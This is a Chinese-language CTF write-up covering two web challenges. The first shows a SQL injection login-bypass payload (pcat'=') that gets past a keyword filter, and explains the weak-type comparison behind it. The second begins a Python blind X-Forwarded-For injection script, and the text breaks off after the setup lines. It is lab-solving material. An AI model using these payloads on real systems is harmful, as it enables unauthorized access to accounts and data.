登陆一下好吗
类型:sql注入
已经过滤了/ # -- select or union |
等,但是没有过滤单引号
payload:username=pcat'='&password=pcat'='
原sql语句为:
select * from user where username='用户名' and password='密码'
拼接后为:
select * from user where username='pcat'='' and password='pcat'=''
计算机首先计算username='pcat'
,返回为0(false),再计算0=”,结果为1
最终语句等同于
select * from user where 1 and 1
即
select * from user
关于弱类型的比较:
以下情况都会为true
1=’1’
1=’1.0’
1=’1后接字母(再后面有数字也可以)’
0=’除了非0数字开头的字符串’
(总体上只要前面达成0的话,要使语句为true很简单,所以这题的万能密码只要按照我上面的法子去写一大把)
who are you?
类型:xff注入
# -*- coding: utf-8 -*-
import requests
import time
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
flag = ''